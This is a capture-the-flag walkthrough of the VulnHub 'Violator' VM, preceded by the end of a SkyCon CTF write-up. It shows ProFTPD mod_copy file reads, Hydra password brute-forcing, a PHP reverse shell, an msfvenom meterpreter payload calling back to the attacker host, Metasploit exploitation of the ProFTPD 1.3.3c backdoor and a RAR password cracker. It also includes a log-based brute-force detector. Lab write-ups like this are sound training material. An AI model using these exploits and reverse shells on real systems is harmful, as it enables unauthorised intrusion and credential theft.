Cmd #1 @ 0x4f2660: echo 66 6c 61 67 7b 38 34 31 64 64 33 64 62 32 39 62 30 66 62 62 64 38 39 63 37 62 35 62 65 37 36 38 63 64 63 38 31 7d > code.txt

Once again I was able to use Python to decode the Hex and grab the last flag.

root@kali:~/Desktop/skyconCTF# python
Python 2.7.12+ (default, Sep  1 2016, 20:27:38) 
[GCC 6.2.0 20160822] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> "666c61677b38343164643364623239623066626264383963376235626537363863646338317d".decode('hex')
'flag{841dd3db29b0fbbd89c7b5be768cdc81}'
>>> 

Flag 3 had me stumped. I ran Wireshark and Ettercap for a while since it seemed to allude to traffic sniffing, but had no luck. I dug around the file system for a while and did not notice any services calling out. Eventually I took a look at the Apache configuration and found flag3 hidden inside the apache.crt file.

I decoded the base64 in Burp which gave me the MD5 of ‘personnel’. Luckily I found that page with Dirbuster or I would have been quite stuck.

This was a fun challenge and I got to play around with forensics tools a bit. I spent quite some time going through the memory dump with Volatility afterwards, really cool stuff.

Thanks to @jamesbower for putting this challenge together as well as @g0tmi1k and the @vulnhub team for continuing to maintain this community.

Violator vulnhub VM walkthrough


A while back knightmare asked me to test his boot2root challenge named Violator. Having thoroughly enjoyed his first three, Droopy, Gibson and Sidney, I jumped at the opportunity.

Like his other VMs it had a theme, this one being Depeche Mode themed.

You can grab a copy for yourself here: https://www.vulnhub.com/entry/violator-1,153/

When testing a boot2root I typically approach it as any other challenge, only stopping along the way if I feel I discover a flaw/unintended path, something appears to be broken or I just 100% hit a wall.

Knightmare provided me with the following hints to get going (I’ve also learned by now to set the HDD on all his VMs to non-persistent 🙂 ) :

  • Vince Clarke can help you with the Fast Fashion.
  • The challenge isn’t over with root. The flag is something special.
  • I have put a few trolls in, but only to sport with you.

Without further ado, here goes:

As always, we start off with a quick nmap scan. This one turns up an FTP service and Apache web server.

root@mrb3n:/# nmap -sV 192.168.110.183

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-09-16 10:13 EDT
Nmap scan report for 192.168.110.183
Host is up (0.00011s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.5rc3
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 00:0C:29:7D:C7:3C (VMware)
Service Info: OS: Unix

The web server is pretty sparse. There is an image of Foghorn Leghorn from Looney Tunes as well as a link to a Wikipedia page about the Depeche Mode album ‘Violator’, which I can only assume is a hint for later.

root@mrb3n:~# curl -s http://192.168.110.183
<html>
<title>I Say... I say... I say Boy! You pumpin' for oil or somethin'...?</title>
  <body>
    <br>I Say.. I say... I say boy!  You're barkin up the wrong tree!</br>
    <img src="foggie.jpg" alt="foggie.jpg" height=1041" width="731">
   <-- https://en.wikipedia.org/wiki/Violator_(album)  -->
  </body>
</html>

I pulled down the image and checked it with exiftool but did not find any hidden treasures.

Leaving the web server aside and taking a look at the FTP service banner, I find a ProFTPD 1.3.5 File Copy exploit over on exploit-db. Maybe I can use this to pull down something interesting?

I attempt to connect anonymously and get rejected so let’s try out this exploit.  If successful, I will be able to use the mod_copy module SITE CPFR/SITE CPTO commands to read/write files remotely and unauthenticated.

root@mrb3n:~# ftp 192.168.110.183
Connected to 192.168.110.183.
220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:192.168.110.183]
Name (192.168.110.183:root): anonymous
331 Password required for anonymous
Password:
530 Login incorrect.
Login failed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

I go after /etc/passwd first.

ftp> site CPFR /etc/passwd
350 File or directory exists, ready for destination name
ftp> site CPTO /var/www/html/passwd
250 Copy successful
ftp>

Awesome! The web root is writable and I was able to pull down a list of usernames.

root@mrb3n:~# curl -s http://192.168.110.183/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
dg:x:1000:1000:Dave Gahan,,,:/home/dg:/bin/bash
proftpd:x:104:65534::/var/run/proftpd:/bin/false
ftp:x:105:65534::/srv/ftp:/bin/false
mg:x:1001:1001:Martin Gore:/home/mg:/bin/bash
af:x:1002:1002:Andrew Fletcher:/home/af:/bin/bash
aw:x:1003:1003:Alan Wilder:/home/aw:/bin/bash

So here we have a list of local usernames, which happen to be the members of Depeche Mode. I attempted to grab /etc/shadow but was denied. I grabbed the group file to see what types of permissions each user has on the target system.

ftp> site CPFR /etc/group
350 File or directory exists, ready for destination name
ftp> site CPTO /var/www/html/group
250 Copy successful

root@mrb3n:~/violator# curl -s http://192.168.110.183/group > group
root@mrb3n:~/violator# cat group | grep sudo
sudo:x:27:dg

The user dg is in the sudoers group so hopefully we can get his creds somehow! At this point I figured I needed some sort of wordlist. The Wikipedia page in the index page source seems like a good candidate. Firing up Cewl I put together a quick wordlist.

root@mrb3n:~/violator# cewl -v 'en.wikipedia.org/wiki/Violator_(album)' -d 1 -w violator.txt

This wordlist didn’t get me anywhere. After some fumbling around with various combinations I settled on a wordlist of all of the song titles, lowercase, without spaces or special characters. First we remove all spaces.

root@mrb3n:~/violator# sed 's/ //g' violator > violator_nospaces

We can clean things up a bit more with cut and tr.

root@mrb3n:~/violator# cut -d'"' -f2 violator_nospaces | tr '[:upper:]' '[:lower:]' > violator_list
root@mrb3n:~/violator# cat violator_list 
worldinmyeyes
sweetestperfection
personaljesus
halo
waitingforthenight
enjoythesilence
policyoftruth
bluedress
clean
dangerous
memphisto
sibeling
kaleid
happiestgirl
seaofsin
enjoythesilence
enjoythesilence
enjoythesilence
sibeling
enjoythesilence
enjoythesilence
enjoythesilence
memphisto

Interestingly enough, Hydra finds valid passwords for all 4 users. Dg is my target so let’s check his account first.

root@mrb3n:~/violator# hydra -L users -P violator_list ftp://192.168.110.183
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-09-16 14:00:35
[DATA] max 16 tasks per 1 server, overall 64 tasks, 96 login tries (l:4/p:24), ~0 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.110.183   login: dg   password: policyoftruth
[21][ftp] host: 192.168.110.183   login: mg   password: bluedress
[21][ftp] host: 192.168.110.183   login: af   password: enjoythesilence
[21][ftp] host: 192.168.110.183   login: aw   password: sweetestperfection
1 of 1 target successfully completed, 4 valid passwords found
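From the defender’s side, the Hydra run above is 96 login attempts against four accounts in a few seconds, and ProFTPD writes every one of them to the auth log via syslog. The following is an added example, not code from this write-up or from the ProFTPD project, of the detection logic for that pattern: it parses log lines modelled on ProFTPD’s “USER name (Login failed)” / “USER name: Login successful” messages, counts failures per client address inside a sliding time window, flags spraying (many accounts from one source) and reports which of the targeted accounts logged in right after the burst. The sample lines, host names, PIDs and thresholds are all constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Syslog prefix as written by ProFTPD, then "host (client[ip]): USER name ...".
_PREFIX = (r'^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ proftpd\[\d+\] \S+ '
           r'\([^\[]*\[(?P<ip>[^\]]+)\]\): USER (?P<user>\S+)')
FAIL_RE = re.compile(_PREFIX + r' \(Login failed\)')
OK_RE = re.compile(_PREFIX + r': Login successful')


def _parse_ts(ts):
    # syslog timestamps carry no year; 1900 is fine for computing deltas
    return datetime.strptime(ts, "%b %d %H:%M:%S")


def _line(ts, pid, ip, user, ok):
    """Build one constructed log line in ProFTPD's auth-log shape."""
    outcome = ": Login successful." if ok else " (Login failed): Incorrect password."
    return "%s violator proftpd[%d] violator (%s[%s]): USER %s%s" % (ts, pid, ip, ip, user, outcome)


ATTACKER = "192.168.110.179"   # constructed: the scanning host from the write-up
SAMPLE_LOG = "\n".join(
    # 12 failures in two seconds: 3 password guesses against each of 4 accounts
    [_line("Sep 16 14:00:35" if i < 6 else "Sep 16 14:00:36", 2100 + i, ATTACKER, user, False)
     for i, user in enumerate(["dg", "mg", "af", "aw"] * 3)]
    + [_line("Sep 16 14:00:37", 2112, ATTACKER, "dg", True),            # a guess succeeded
       _line("Sep 16 14:05:12", 2150, "192.168.110.50", "af", False),   # an ordinary typo
       _line("Sep 16 14:05:40", 2151, "192.168.110.50", "af", True)])


def detect_ftp_bruteforce(log_text, threshold=8, window=timedelta(seconds=60)):
    """Return one alert per client IP whose densest run of failed logins inside
    `window` reaches `threshold`. Each alert lists the accounts targeted, whether
    this looks like spraying (several accounts) and which targeted accounts
    logged in successfully at or after the end of the burst."""
    failures = defaultdict(list)   # ip -> [(timestamp, user), ...]
    successes = defaultdict(list)
    for line in log_text.splitlines():
        m = FAIL_RE.match(line)
        if m:
            failures[m.group("ip")].append((_parse_ts(m.group("ts")), m.group("user")))
            continue
        m = OK_RE.match(line)
        if m:
            successes[m.group("ip")].append((_parse_ts(m.group("ts")), m.group("user")))

    alerts = []
    for ip, events in sorted(failures.items()):
        events.sort()
        best, start = (0, 0), 0
        for end in range(len(events)):
            # advance `start` until events[start..end] fit inside the window
            while events[end][0] - events[start][0] > window:
                start += 1
            if end - start > best[1] - best[0]:
                best = (start, end)
        burst = events[best[0]:best[1] + 1]
        if len(burst) < threshold:
            continue
        burst_end = burst[-1][0]
        targeted = sorted({u for _, u in burst})
        compromised = sorted({u for t, u in successes.get(ip, [])
                              if t >= burst_end and u in targeted})
        alerts.append({"ip": ip, "failures": len(burst), "users": targeted,
                       "spray": len(targeted) > 1, "logged_in_after": compromised})
    return alerts


if __name__ == "__main__":
    for alert in detect_ftp_bruteforce(SAMPLE_LOG):
        print(alert)
```

On the sample the single alert names 192.168.110.179 with 12 failures against af, aw, dg and mg, marks it as spraying, and lists dg as the account that logged in straight after the burst; the one failed attempt from 192.168.110.50 stays below the threshold. The “logged in after the burst” field is the part worth paging someone for, since it separates a noisy scan from an actual credential compromise.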

Logging in I am in dg’s home directory and am able to change to various other directories, including those for our other 3 users.

root@mrb3n:~# ftp 192.168.110.183
Connected to 192.168.110.183.
220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:192.168.110.183]
Name (192.168.110.183:root): dg
331 Password required for dg
Password:
230 User dg logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
257 "/home/dg" is the current directory
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x  10 root     root         4096 Jun  6 20:31 bd
226 Transfer complete
ftp> cd ..
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   3 af       af           4096 Jun 12 09:25 af
drwxr-xr-x   2 aw       aw           4096 Jun 12 09:25 aw
drwxr-xr-x   4 dg       dg           4096 Jun 14 18:55 dg
drwxr-xr-x   2 mg       mg           4096 Jun 12 09:28 mg

I pull down various files for inspection locally.

ftp> get minarke-1.21.tar.bz2
local: minarke-1.21.tar.bz2 remote: minarke-1.21.tar.bz2
200 PORT command successful
150 Opening BINARY mode data connection for minarke-1.21.tar.bz2 (15576 bytes)
226 Transfer complete
15576 bytes received in 0.01 secs (2.7953 MB/s)

150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 aw       aw             59 Jun 12 09:19 hint
226 Transfer complete
ftp> get hint
local: hint remote: hint

150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 mg       mg            112 Jun 12 09:28 faith_and_devotion
226 Transfer complete
ftp> get faith_and_devotion
local: faith_and_devotion remote: faith_and_devotion
200 PORT command successful
150 Opening BINARY mode data connection for faith_and_devotion (112 bytes)
226 Transfer complete

Dg’s home directory contains a more extensive directory listing which we’ll have to come back to later.

ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   2 root     root         4096 Jun  6 20:31 bin
drwxr-xr-x   2 root     root         4096 Jun  6 20:46 etc
drwxr-xr-x   3 root     root         4096 Jun  6 20:31 include
drwxr-xr-x   4 root     root         4096 Jun  6 20:31 lib
drwxr-xr-x   2 root     root         4096 Jun  6 20:31 libexec
drwxr-xr-x   2 root     root         4096 Jun  6 20:31 sbin
drwxr-xr-x   4 root     root         4096 Jun  6 20:31 share
drwxr-xr-x   2 root     root         4096 Jun  6 22:17 var

Taking a look at our loot, the hint file is a bit vague…for now…

root@mrb3n:~/violator# cat hint
You are getting close... Can you crack the final enigma..?

The Minarke archive is interesting: a C file and makefile for compiling an Enigma M4 emulator. We know that knightmare is infamous for flag challenges so I am almost certain this will come into play later.

root@mrb3n:~/violator/minarke-1.21# cat minarke.c 
/* Minarke, an Enigma M4 emulator
 *
 * Written by John Gilbert
 * Version 1.21
 * (c) 2008

I compile it and check out the binary. Our suspicions are confirmed: this can be used to crack some Enigma code. Pretty awesome. Now let’s find that code!

root@mrb3n:~/violator/minarke-1.21# make
gcc -g -Wall -o minarke minarke.c
root@mrb3n:~/violator/minarke-1.21# ./minarke 


Minarke, an Enigma M4 emulator
by John Gilbert

Emulates the Kriegsmarine M4 Enigma encryption machine

	Initial Setup Notes
Rotors: Reflector (B/C), Thin Rotor (B/G), 3 Rotors (1-8, can't reuse them) 
Use BB### or CG### with A### settings to read/create Wehrmacht three rotor traffic 
Ring and position settings: A-Z for each of the 4 rotors
Reflector setting is always fixed at A.
Plugboard settings: A-Z,A-Z pairs, also won't allow reuse
Hit return to end input, 11 pairs recomended for maximum security.
Hit ESC at any time to quit.

	Special Keys (during input mode)
1: rewind one setting
2: reset position settings
3: new position settings
4: new setup
9: toggle debug
0: show position settings
?: show help

see http://en.wikipedia.org/wiki/Enigma_machine
also http://www.bytereef.org/m4_project.html


Rotors: 

The faith_and_devotion file contains what we need to use the Enigma machine once we have the code.

root@mrb3n:~/violator# cat faith_and_devotion 
Lyrics:

* Use Wermacht with 3 rotors
* Reflector to B
Initial: A B C
Alphabet Ring: C B A
Plug Board A-B, C-D

Now I need a shell. Since /var/www/html appears to be writable, I attempt to upload a PHP reverse shell. If all goes well and knightmare doesn’t have any tricks up his sleeve I should be able to grab a nice reverse shell.

root@mrb3n:~# ftp 192.168.110.183
Connected to 192.168.110.183.
220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:192.168.110.183]
Name (192.168.110.183:root): dg
331 Password required for dg
Password:
230 User dg logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /var/www/html
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 dg       dg          51256 Jun  6 20:00 foggie.jpg
-rw-r--r--   1 proftpd  nogroup       699 Sep 16 17:39 group
-rw-rw-r--   1 dg       dg            318 Jun 12 17:26 index.html
-rw-r--r--   1 proftpd  nogroup      1330 Sep 16 15:24 passwd
226 Transfer complete
ftp> put /var/www/html/violator.php 
local: /var/www/html/violator.php remote: /var/www/html/violator.php
200 PORT command successful
150 Opening BINARY mode data connection for /var/www/html/violator.php
226 Transfer complete
3463 bytes sent in 0.00 secs (33.0257 MB/s)
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 dg       dg          51256 Jun  6 20:00 foggie.jpg
-rw-r--r--   1 proftpd  nogroup       699 Sep 16 17:39 group
-rw-rw-r--   1 dg       dg            318 Jun 12 17:26 index.html
-rw-r--r--   1 proftpd  nogroup      1330 Sep 16 15:24 passwd
-rw-r--r--   1 dg       dg           3463 Sep 16 18:18 violator.php
226 Transfer complete

I browse to my violator.php reverse shell script and sure enough get a connection as www-data.

root@mrb3n:~/violator# curl -s http://192.168.110.183/violator.php

root@mrb3n:~# nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.110.179] from (UNKNOWN) [192.168.110.183] 33641
Linux violator 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 19:20:09 up  3:00,  0 users,  load average: 0.00, 0.01, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@violator:/$ 

I su to the dg user and check what he is able to run as root, since I remembered from earlier that he is a member of the sudo group. Interesting: he can run another copy of proftpd as root without a password, the one we saw earlier in his home directory.

www-data@violator:/$ su dg
su dg
Password: policyoftruth

dg@violator:/$ sudo -l
sudo -l
Matching Defaults entries for dg on violator:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User dg may run the following commands on violator:
    (ALL) NOPASSWD: /home/dg/bd/sbin/proftpd
dg@violator:~/bd/sbin$ file proftpd
file proftpd
proftpd: ELF 64-bit LSB  executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=8abf34e54323fc0bb0320d1ea3750da2e57ecd08, stripped

dg@violator:~/bd/sbin$ sudo ./proftpd
sudo ./proftpd
 - setting default address to 127.0.0.1
localhost - SocketBindTight in effect, ignoring DefaultServer

We now have another service running locally on port 2121. How can this be abused to gain root privs?

dg@violator:~/bd/sbin$ netstat -antp
netstat -antp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:2121          0.0.0.0:*               LISTEN      -               
tcp        0    218 192.168.110.183:33641   192.168.110.179:443     ESTABLISHED 1391/bash       
tcp6       0      0 :::21                   :::*                    LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               
tcp6       0      0 192.168.110.183:80      192.168.110.179:56414   ESTABLISHED -               
tcp6       0      0 192.168.110.183:21      192.168.110.179:56886   ESTABLISHED -

Connecting to port 2121 locally, I see we are dealing with ProFTPD 1.3.3c.

dg@violator:~/bd/sbin$ telnet 127.0.0.1 2121
telnet 127.0.0.1 2121
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
220 ProFTPD 1.3.3c Server (Depeche Mode Violator Server) [127.0.0.1]

This particular ProFTPD release (1.3.3c) has a known backdoor command execution vulnerability which hopefully we can use to escalate privileges. There are many ways to do this; the way I did it worked, but of course there are other options.

root@mrb3n:~# searchsploit ProFTPD 1.3.3c
------------------------------------------------- ----------------------------------
 Exploit Title                                   |  Path
                                                 | (/usr/share/exploitdb/platforms)
------------------------------------------------- ----------------------------------
ProFTPD 1.3.3c - Compromised Source Remote Root  | ./linux/remote/15662.txt
ProFTPD-1.3.3c Backdoor Command Execution        | ./linux/remote/16921.rb

It looks like I will need Metasploit to take advantage of this exploit so I quickly create a meterpreter PHP payload and upload it to the target, execute and grab a meterpreter shell.

root@mrb3n:/var/www/html# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.110.179 LPORT=8443 -f raw > violator_meterp.php

I could have used FTP to transfer the file, but after seeing that knightmare was kind enough to remove curl and wget I had to find another way.

Connection closed by foreign host.
dg@violator:~/bd/sbin$ wget http://192.168.110.179/violator_meterp.php -O /var/www/html/shell.php
< http://192.168.110.179/violator_meterp.php -O /var/www/html/shell.php      
The program 'wget' is currently not installed. You can install it by typing:
sudo apt-get install wget
dg@violator:~/bd/sbin$ curl -O http://192.168.110.179/violator_meterp.php
curl -O http://192.168.110.179/violator_meterp.php
The program 'curl' is currently not installed. You can install it by typing:
sudo apt-get install curl

SCP was still installed, so I was able to transfer the file that way (as root, which is super secure!).

dg@violator:/var/www/html$ scp root@192.168.110.179:/var/www/html/violator_meterp.php .
<scp root@192.168.110.179:/var/www/html/violator_meterp.php .                
root@192.168.110.179's password: 🙂

violator_meterp.php                           100%   26KB  25.6KB/s   00:00 

Don’t forget to chown the file as dg so we can catch a session as this user.

dg@violator:/var/www/html$ chown dg:dg violator_meterp.php

Quickly set up metasploit to catch our shiny new meterpreter shell.

msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter_reverse_tcp 
payload => php/meterpreter_reverse_tcp
msf exploit(handler) > set lhost 192.168.110.179
lhost => 192.168.110.179
msf exploit(handler) > set lport 8443
lport => 8443

Executing the shell I gain a connection and it’s time to set up some port forwarding so I can attack the remote port 2121 directly.

dg@violator:/var/www/html$ php violator_meterp.php


msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.110.179:8443 
[*] Starting the payload handler...
[*] Meterpreter session 1 opened (192.168.110.179:8443 -> 192.168.110.183:35213) at 2016-09-16 14:50:38 -0400

I use the built-in meterpreter portfwd command to set up the tcp relay.

meterpreter > portfwd add -L 127.0.0.1 -l 2121 -p 2121 -r 127.0.0.1
[*] Local TCP relay created: 127.0.0.1:2121 <-> 127.0.0.1:2121

Searching in metasploit I quickly find the exploit I’m looking for and configure it based on our port forwarding rule.

msf exploit(handler) > search ProFTPD

Matching Modules
================

   Name                                         Disclosure Date  Rank       Description
   ----                                         ---------------  ----       -----------
   exploit/freebsd/ftp/proftp_telnet_iac        2010-11-01       great      ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
   exploit/linux/ftp/proftp_sreplace            2006-11-26       great      ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
   exploit/linux/ftp/proftp_telnet_iac          2010-11-01       great      ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
   exploit/linux/misc/netsupport_manager_agent  2011-01-08       average    NetSupport Manager Agent Remote Buffer Overflow
   exploit/unix/ftp/proftpd_133c_backdoor       2010-12-02       excellent  ProFTPD-1.3.3c Backdoor Command Execution
   exploit/unix/ftp/proftpd_modcopy_exec        2015-04-22       excellent  ProFTPD 1.3.5 Mod_Copy Command Execution
msf exploit(proftpd_133c_backdoor) > use cmd/unix/reverse_perl
msf payload(reverse_perl) > show options 

Module options (payload/cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port

msf payload(reverse_perl) > set LHOST 192.168.110.179
LHOST => 192.168.110.179
msf payload(reverse_perl) > exploit
[-] Unknown command: exploit.
msf payload(reverse_perl) > use exploit/unix/ftp/proftpd_133c_backdoor
msf exploit(proftpd_133c_backdoor) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf exploit(proftpd_133c_backdoor) > set LHOST 192.168.110.179
LHOST => 192.168.110.179

I run the exploit and pop a root shell.

msf exploit(proftpd_133c_backdoor) > exploit

[*] Started reverse TCP handler on 192.168.110.179:4444 
[*] Sending Backdoor Command
[*] Command shell session 6 opened (192.168.110.179:4444 -> 192.168.110.183:44484) at 2016-09-16 15:59:57 -0400

id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
python -c 'import pty;pty.spawn("/bin/bash")'
root@violator:/#

Checking for our flag, it was, as I expected, a troll 🙂

root@violator:/root# cat flag.txt
cat flag.txt
I say... I say... I say boy! Pumping for oil or something...?
---Foghorn Leghorn "A Broken Leghorn" 1950 (C) W.B.

The hidden directory ‘.basildon’ in root’s home directory contains a file, crocs.rar.

root@violator:/root# ls -lah
ls -lah
total 24K
drwx------  3 root root 4.0K Jun 14 19:56 .
drwxr-xr-x 22 root root 4.0K Jun 14 19:44 ..
-rw-r--r--  1 root root 3.1K Feb 20  2014 .bashrc
d--x------  2 root root 4.0K Jun 14 19:57 .basildon
-rw-r--r--  1 root root  114 Jun 12 10:22 flag.txt
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
root@violator:/root# cd .basildon
cd .basildon
root@violator:/root/.basildon# ls -lah
ls -lah
total 148K
d--x------ 2 root root 4.0K Jun 14 19:57 .
drwx------ 3 root root 4.0K Jun 14 19:56 ..
-rw-r--r-- 1 root root 138K Jun 12 14:46 crocs.rar

I move the file over to the web root and pull it down locally for analysis.

root@mrb3n:~/violator# curl -O http://192.168.110.183/crocs.rar
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  137k  100  137k    0     0  20.6M      0 --:--:-- --:--:-- --:--:-- 22.3M

root@mrb3n:~/violator# file crocs.rar 
crocs.rar: RAR archive data, v1d, os: Win32

root@mrb3n:~/violator# unrar e crocs.rar

UNRAR 5.21 freeware      Copyright (c) 1993-2015 Alexander Roshal

Extracting from crocs.rar

Enter password (will not be echoed) for artwork.jpg: 

Hmm, a password protected rar containing an image file. I was stuck here for a while. First I used Cewl to create a word list based on our original Wikipedia page but had no luck. I then ran the earlier song list without spaces that got us our user accounts and still no luck. Combining everything I had and using a quick rar brute force Python script I got a result.

#!/usr/bin/python
from __future__ import print_function

import rarfile      # pip install rarfile; needs the unrar binary on the PATH
import subprocess
import sys

subprocess.call('clear', shell=True)
print("Rar file password brute forcer\n")

# 'violator_songs' is the combined wordlist described above, one candidate per line.
# Only the newline is stripped: the candidates may legitimately contain spaces.
rFile = rarfile.RarFile('crocs.rar')
for line in open('violator_songs'):
    password = line.strip('\n')
    try:
        # extractall() raises (wrong password or CRC error) on a bad guess,
        # so reaching the print means the password was correct
        rFile.extractall(pwd=password)
        print('Correct Password = ' + password + '\n')
        sys.exit(0)
    except Exception:
        pass

Our password, and the artwork.jpg file!

root@mrb3n:~/violator# python rarcracker.py 

Rar file password brute forcer

Correct Password = World in My Eyes

This time exiftool gave us something juicy, which I believe is our Enigma code.

root@mrb3n:~/violator# wine /root/Desktop/exiftool.exe artwork.jpg 
ExifTool Version Number         : 10.07
File Name                       : artwork.jpg
Directory                       : .
File Size                       : 183 kB
File Modification Date/Time     : 2016:06:12 14:38:12-04:00
File Access Date/Time           : 2016:09:16 21:03:34-04:00
File Creation Date/Time         : 2016:06:12 14:38:12-04:00
File Permissions                : rw-rw-rw-
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 300
Y Resolution                    : 300
Exif Byte Order                 : Big-endian (Motorola, MM)
Image Description               : Violator
Software                        : Google
Artist                          : Dave Gaham
Copyright                       : UKSNRSPYLEWHKOKZARVKDEINRLIBWIUCFQRQKAQQGQLTIUCYMFENULUVFOYQDKPHSUJHFUJSAYJDFGDFRYWKLSVNJNVDVSBIBFNIFASOPFDVEYEBQYCOGULLLVQPUWISDBNLNQIJUEZACAKTPPSBBLWRHKZBJMSKLJOACGJMFVXZUEKBVWNKWEKVKDMUYFLZEOXCIXIUHJOVSZXFLOZFQTNSKXVWUHJLRAEERYTDPVNZPGUIMXZMESMAMBDVKFZSDEIQXYLJNKTBDSRYLDPPOIVUMZDFZPEWPPVHGPFBEERMDNHFIWLSHZYKOZVZYNEXGPROHLMRHFEIVIIATOAOJAOVYFVBVIYBGUZXXWFKGJCYEWNQFTPAGLNLHVCRDLFHSXHVMCERQTZOOZARBEBWCBCIKUOFQIGZPCMWRHJEMUSGYBGWXJENRZHZICACWOBJMI
Exif Version                    : 0220
Date/Time Original              : 1990:03:19 22:13:30
Create Date                     : 1990:03:19 22:13:30
Sub Sec Time Original           : 04
Sub Sec Time Digitized          : 04
Exif Image Width                : 1450
Exif Image Height               : 1450
XP Title                        : Violator
XP Author                       : Dave Gaham
XP Keywords                     : created by user dg
XP Subject                      : policyoftruth
Padding                         : (Binary data 1590 bytes, use -b option to extract)
About                           : uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b
Rights                          : UKSNRSPYLEWHKOKZARVKDEINRLIBWIUCFQRQKAQQGQLTIUCYMFENULUVFOYQDKPHSUJHFUJSAYJDFGDFRYWKLSVNJNVDVSBIBFNIFASOPFDVEYEBQYCOGULLLVQPUWISDBNLNQIJUEZACAKTPPSBBLWRHKZBJMSKLJOACGJMFVXZUEKBVWNKWEKVKDMUYFLZEOXCIXIUHJOVSZXFLOZFQTNSKXVWUHJLRAEERYTDPVNZPGUIMXZMESMAMBDVKFZSDEIQXYLJNKTBDSRYLDPPOIVUMZDFZPEWPPVHGPFBEERMDNHFIWLSHZYKOZVZYNEXGPROHLMRHFEIVIIATOAOJAOVYFVBVIYBGUZXXWFKGJCYEWNQFTPAGLNLHVCRDLFHSXHVMCERQTZOOZARBEBWCBCIKUOFQIGZPCMWRHJEMUSGYBGWXJENRZHZICACWOBJMI
Creator                         : Dave Gaham
Subject                         : created by user dg
Title                           : Violator
Description                     : Violator
Warning                         : [minor] Fixed incorrect URI for xmlns:MicrosoftPhoto
Date Acquired                   : 1941:05:09 10:30:18.134
Last Keyword XMP                : created by user dg
Image Width                     : 1450
Image Height                    : 1450
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
